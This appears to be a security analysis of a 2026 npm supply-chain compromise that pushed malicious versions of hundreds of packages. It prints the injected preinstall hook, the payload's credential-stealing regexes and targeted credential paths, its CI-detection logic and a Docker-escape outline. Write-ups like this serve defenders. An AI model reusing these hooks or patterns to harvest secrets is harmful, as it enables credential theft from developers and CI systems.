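  'ghola', 'powindah', 'prana', 'kralizec',
];
const WORD2 = [
  'sandworm', 'ornithopter', 'heighliner', 'stillsuit', 'lasgun', 'sietch',
  'melange', 'thumper', 'navigator', 'fedaykin', 'futar', 'phibian',
  'slig', 'cogitor', 'laza', 'ghola',
];

// Assumption: the number has 1 to 3 digits; leading zeros are not ruled out.
const EXFIL_REPO_NAME = new RegExp(
  `^(?:${WORD1.join('|')})-(?:${WORD2.join('|')})-\\d{1,3}$`
);

// Hypothetical helper: true when a repository name fits the reported pattern.
function isSuspectRepoName(name) {
  return EXFIL_REPO_NAME.test(name);
}

// Example: filter a list of repository names (made-up sample data).
const sampleNames = ['fremen-sandworm-42', 'my-website', 'ghola-laza-7'];
console.log(sampleNames.filter(isSuspectRepoName));
```

A name match is only a hint; the repository description and creation time should be checked before drawing conclusions.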

If you are au­dit­ing lock­files or re­in­stalling on af­fected ma­chines, Package Manager Guard (pmg) is an open-source in­stall proxy that eval­u­ates pack­ages against threat in­tel­li­gence be­fore pre­in­stall scripts run. Its de­pen­dency cooldown can refuse ver­sions pub­lished in­side a con­fig­urable win­dow, which helps against bursts like the May 19 wave where semver ranges were still re­solv­ing to freshly pub­lished ma­li­cious re­leases.
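To illustrate the idea behind a dependency cooldown, here is a minimal sketch of the filtering step. It is not pmg's implementation or API: the function `filterByCooldown`, the seven-day window, and both timestamps are assumptions chosen for illustration (the article only states that the malicious versions were published on May 19, 2026).

```javascript
// Keep only versions that were published at least `cooldownMs` before `now`.
// `publishTimes` maps version strings to ISO 8601 publish timestamps.
function filterByCooldown(publishTimes, now, cooldownMs) {
  return Object.entries(publishTimes)
    .filter(([, iso]) => now.getTime() - new Date(iso).getTime() >= cooldownMs)
    .map(([version]) => version);
}

// Hypothetical timestamps for illustration only.
const publishTimes = {
  '3.0.6': '2024-01-01T00:00:00Z',
  '3.2.7': '2026-05-19T01:50:00Z',
};
const sevenDaysMs = 7 * 24 * 60 * 60 * 1000;
const now = new Date('2026-05-19T12:00:00Z');

// Versions still inside the cooldown window are dropped before range resolution.
console.log(filterByCooldown(publishTimes, now, sevenDaysMs));
```

With a filter like this applied before range resolution, a freshly published version cannot be selected until the window has passed, which leaves time for a compromise to be detected and the versions to be unpublished.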

Analysis

Account Compromise and Blast Radius

The atool npm ac­count main­tains 547 pack­ages. The at­tacker pub­lished 637 ma­li­cious ver­sions across 314 of those pack­ages in two au­to­mated waves, both on May 19, 2026:

Most pack­ages (309) re­ceived ex­actly 2 ma­li­cious ver­sions, one per wave. Four pack­ages (size-sensor, echarts-for-re­act, jest-can­vas-mock, jest-date-mock) re­ceived 3 ver­sions, sug­gest­ing they were used for early test­ing be­fore the bulk pub­lish.

A sam­ple of the high­est-im­pact af­fected pack­ages:

The attacker did not move the latest dist-tag on most packages. For echarts-for-react, latest still points to 3.0.6. This provides no protection: npm's semver resolution picks the highest version matching a range, regardless of the latest tag. Any project with "echarts-for-react": "^3.0.6" in its package.json resolves to 3.2.7 (malicious) on the next clean install.

Execution Trigger

Every com­pro­mised ver­sion makes ex­actly two changes to pack­age.json:

    // package.json diff (size-sensor 1.0.3 → 1.1.4)
    - "version": "1.0.3",
    + "version": "1.1.4",
      "scripts": {
        …
    -   "build": "npm run build:umd && npm run build:lib && limit-size"
    +   "build": "npm run build:umd && npm run build:lib && limit-size",
    +   "preinstall": "bun run index.js"
      },
    + "optionalDependencies": {
    +   "@antv/setup": "github:antvis/G2#1916faa365f2788b6e193514872d51a242876569"
    + },

The pre­in­stall hook runs be­fore any de­pen­dency in­stal­la­tion and re­quires Bun as the run­time. 630 of the 637 ma­li­cious ver­sions also in­ject an op­tion­alDe­pen­den­cies en­try that de­liv­ers a sec­ond copy of the pay­load via the le­git­i­mate antvis/​G2 GitHub repos­i­tory (see Imposter Commits in antvis/​G2 be­low).
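Both manifest changes are easy to test for mechanically. The sketch below checks a parsed package.json object for the two indicators described in this section; the function name `findManifestIndicators` is hypothetical, and the check is deliberately narrow (exact preinstall command, `github:antvis/G2#` prefix), so a variant payload could evade it.

```javascript
// Return a list of indicators found in a parsed package.json object.
function findManifestIndicators(pkg) {
  const hits = [];

  // Indicator 1: the preinstall hook reported in the compromised versions.
  const preinstall = (pkg.scripts && pkg.scripts.preinstall) || '';
  if (preinstall.trim() === 'bun run index.js') {
    hits.push('preinstall hook runs "bun run index.js"');
  }

  // Indicator 2: an optional dependency pinned to a commit in antvis/G2.
  const optional = pkg.optionalDependencies || {};
  for (const [name, spec] of Object.entries(optional)) {
    if (typeof spec === 'string' && spec.startsWith('github:antvis/G2#')) {
      hits.push(`optional dependency ${name} points at an antvis/G2 commit`);
    }
  }
  return hits;
}

// Example using the values from the diff in this section.
const suspicious = {
  version: '1.1.4',
  scripts: { preinstall: 'bun run index.js' },
  optionalDependencies: {
    '@antv/setup': 'github:antvis/G2#1916faa365f2788b6e193514872d51a242876569',
  },
};
console.log(findManifestIndicators(suspicious));
```

In practice the same check would be run over every package.json under node_modules, since the compromised package may be a transitive dependency.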

Malicious Payload

The in­dex.js file is a sin­gle-line, 498KB ob­fus­cated Bun bun­dle. The struc­ture is a di­rect match with the Mini Shai-Hulud pay­load from the SAP com­pro­mise three weeks ear­lier: same Bun run­time re­quire­ment, same hex-vari­able ob­fus­ca­tion pat­tern, same scan­ner ar­chi­tec­ture with a 100KB flush thresh­old, same cre­den­tial regex set. The pay­load uses two lay­ers of ob­fus­ca­tion: a hex-vari­able string lookup table (_0x1169 re­solv­ing from ar­ray _0x5e03) and an en­crypted string de­coder (fc2edea72) that uses base64 + XOR for all sen­si­tive strings like en­vi­ron­ment vari­able names, file paths, and C2 URLs.
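For readers unfamiliar with this style of string hiding, the following sketch shows what a base64 + XOR decoder generally looks like. It is not the payload's fc2edea72 routine: the key, the repeating-key scheme, and the order of operations (base64-decode first, then XOR) are all assumptions made for illustration.

```javascript
// XOR every byte with a repeating key. XOR is its own inverse, so the same
// routine both hides and reveals the data.
function xorBytes(bytes, key) {
  return Buffer.from(bytes.map((b, i) => b ^ key[i % key.length]));
}

// Hypothetical encoder, included only so the example can round-trip.
function encodeString(plain, key) {
  return xorBytes(Buffer.from(plain, 'utf8'), key).toString('base64');
}

// Decoder: base64-decode, then XOR with the key (assumed order).
function decodeString(encoded, key) {
  return xorBytes(Buffer.from(encoded, 'base64'), key).toString('utf8');
}

// Hypothetical key; the real payload's key material is not given in the article.
const key = Buffer.from('example-key', 'utf8');
const hidden = encodeString('GITHUB_TOKEN', key);
console.log(hidden);                    // opaque base64 text in the source file
console.log(decodeString(hidden, key)); // recovered at runtime
```

The practical consequence for defenders is that plain string searches over the bundle will not find environment variable names or URLs; they only appear after the decoder has run.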

The im­ports re­veal the full scope of ca­pa­bil­i­ties:

    // index.js: extracted import statements
    import { execSync } from 'child_process';
    import { spawn } from 'child_process';
    import { homedir } from 'os';
    import { readFile, readFileSync, writeFileSync, createWriteStream } from 'fs';
    import { createHash, createDecipheriv, pbkdf2Sync, generateKeyPairSync, sign } from 'crypto';
    import { pipeline } from 'stream/promises';

The pay­load’s main func­tion J2() or­ches­trates the at­tack through a scan­ner ar­chi­tec­ture. It in­stan­ti­ates mul­ti­ple scan­ner classes, each tar­get­ing a dif­fer­ent cre­den­tial type, and dis­patches re­sults through a batched sender (Po) with a 100KB flush thresh­old. A CI en­vi­ron­ment de­tec­tion mod­ule checks for 20+ plat­forms via en­vi­ron­ment vari­ables: GitHub Actions (GITHUB_ACTIONS), Jenkins (JENKINS_URL, JENKINS_HOME), GitLab CI (GITLAB_CI), CircleCI (CIRCLECI), Travis (TRAVIS), Buildkite (BUILDKITE), Drone (DRONE), TeamCity (TEAMCITY_VERSION), AppVeyor (APPVEYOR), Bitbucket Pipelines (BITBUCKET_BUILD_NUMBER), Bitrise (BITRISE_IO), Semaphore (SEMAPHORE), CodeBuild (CODEBUILD_BUILD_ID), Azure DevOps (BUILD_BUILDURI), Cirrus CI (CIRRUS_CI), Netlify (NETLIFY), Vercel (VERCEL), CF Pages (CF_PAGES), Buddy (BUDDY_WORKSPACE_ID), Vela (VELA), Screwdriver (SCREWDRIVER), SailCI (SAILCI), Wercker (WERCKER_MAIN_PIPELINE_STARTED), Shippable (SHIPPABLE), Distelli (DISTELLI_APPNAME), and JetBrains Space (JB_SPACE_EXECUTION_NUMBER). When run­ning in GitHub Actions, ad­di­tional data col­lec­tion ac­ti­vates: work­flow runs, ar­ti­facts, se­crets meta­data, and OIDC to­ken ex­change.
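Environment-variable CI detection of this kind is simple to picture. The sketch below is a reconstruction for illustration, not the payload's code: the `CI_MARKERS` table and `detectCI` function are hypothetical names, and only a subset of the platforms listed above is included.

```javascript
// Subset of the platform-to-variable mapping listed above.
const CI_MARKERS = {
  'GitHub Actions': ['GITHUB_ACTIONS'],
  'Jenkins': ['JENKINS_URL', 'JENKINS_HOME'],
  'GitLab CI': ['GITLAB_CI'],
  'CircleCI': ['CIRCLECI'],
  'Travis': ['TRAVIS'],
  'Buildkite': ['BUILDKITE'],
};

// Return the names of all platforms whose marker variables are set and non-empty.
function detectCI(env) {
  return Object.entries(CI_MARKERS)
    .filter(([, names]) => names.some((n) => env[n] !== undefined && env[n] !== ''))
    .map(([platform]) => platform);
}

// Example with a made-up environment object instead of process.env.
console.log(detectCI({ GITHUB_ACTIONS: 'true', HOME: '/home/runner' }));
```

Because the check relies only on variables that CI systems set by default, there is little a pipeline can do to hide from it short of unsetting those variables for install steps.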

Credential Harvesting

The pay­load reads 80+ en­vi­ron­ment vari­ables (all names en­crypted via fc2edea72) and scans file con­tents us­ing regex pat­terns. The regex set re­veals what the at­tacker is af­ter:

    // index.js: credential detection patterns (extracted from scanner classes)
    'ghtoken': /gh[op]_[A-Za-z0-9]{36,}/g,
    'npmtoken': /npm_[A-Za-z0-9]{36,}/g,
    'ghs_jwt': /ghs_\d+_[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g,
    'awskey': /(AKIA[0-9A-Z]{16}|aws_access_key_id["\s:=]+["']?[A-Z0-9]{20})/g,
    'gcpKey': /* encrypted; targets GCP service account keys */,
    'azureKey': /(AccountKey|accessKey|client_secret)["\s:=]+["']?[A-Za-z0-9+/=]{40,}/gi,
    'dbConnStr': /(mongodb|mysql|postgresql|postgres|redis):\/\/[^:\s]+:[^@\s]+@[^\s'"]+/gi,
    'stripeKey': /(sk|pk)_(test|live)_[0-9a-zA-Z]{24,}/g,
    'slackToken': /* encrypted */,
    'sshKey': /ssh-(rsa|ed25519|dss) AAAA[0-9A-Za-z+\/]{100,}/g,
    'dockerAuth': /"auth":\s*"[A-Za-z0-9+\/=]{20,}"/g,
    'vaultToken': /hvs\.[A-Za-z0-9_-]{24,}/g,
    'k8stoken': /eyJhbGciOiJSUzI1NiIsImtpZCI6[\w\-\.]+/g,
    'urlCred': /https?:\/\/[^:"'\s]+:[^@"'\s]+@[^\s'"\]]+/g
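The same patterns can be turned around and used defensively, to find out which secrets on a machine would have been visible to the scanner. The sketch below applies a few of the extracted patterns to a block of text; `scanText` is a hypothetical helper, only four patterns are included, and the AWS pattern uses just the first alternative of the extracted regex.

```javascript
// A few of the extracted patterns (the AWS one is simplified to its first alternative).
const PATTERNS = {
  ghtoken: /gh[op]_[A-Za-z0-9]{36,}/g,
  npmtoken: /npm_[A-Za-z0-9]{36,}/g,
  awskey: /AKIA[0-9A-Z]{16}/g,
  vaultToken: /hvs\.[A-Za-z0-9_-]{24,}/g,
};

// Return one finding per match, with a short preview instead of the full secret.
function scanText(text) {
  const findings = [];
  for (const [kind, pattern] of Object.entries(PATTERNS)) {
    for (const match of text.matchAll(pattern)) {
      findings.push({ kind, index: match.index, preview: match[0].slice(0, 8) + '...' });
    }
  }
  return findings;
}

// Example with obviously fake values built at runtime.
const sample = 'token=' + 'ghp_' + 'a'.repeat(36) + '\nkey=AKIA' + 'A'.repeat(16);
console.log(scanText(sample));
```

Any credential that such a scan finds in files or environment dumps on an affected machine should be treated as exposed and rotated.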

The scan­ner also parses AWS STS iden­tity re­sponses, ex­tract­ing <Account> and <Arn> XML tags from GetCallerIdentity calls.

A sep­a­rate file-scan­ning class (zo) reads sen­si­tive paths from the home di­rec­tory. The tar­geted paths are en­crypted via fc2edea72, but the code ref­er­ences a LINUX key in the path map and re­solves ~ via os.home­dir(), tar­get­ing stan­dard cre­den­tial lo­ca­tions: .ssh, .aws/credentials, .npmrc, .docker/config.json, .kube/config, and sim­i­lar paths.

Docker Container Escape

The pay­load checks for the Docker socket and, if pre­sent, at­tempts con­tainer es­cape through three se­quen­tial meth­ods:

    // index.js: deobfuscated attack chain
    async function S1() {
      if (await P2()) return true; // Direct Docker API: create container
      if (await W2()) return true; // Docker API: create + start container
      if (await K2()) return true; // execSync fallback
      return false;
    }
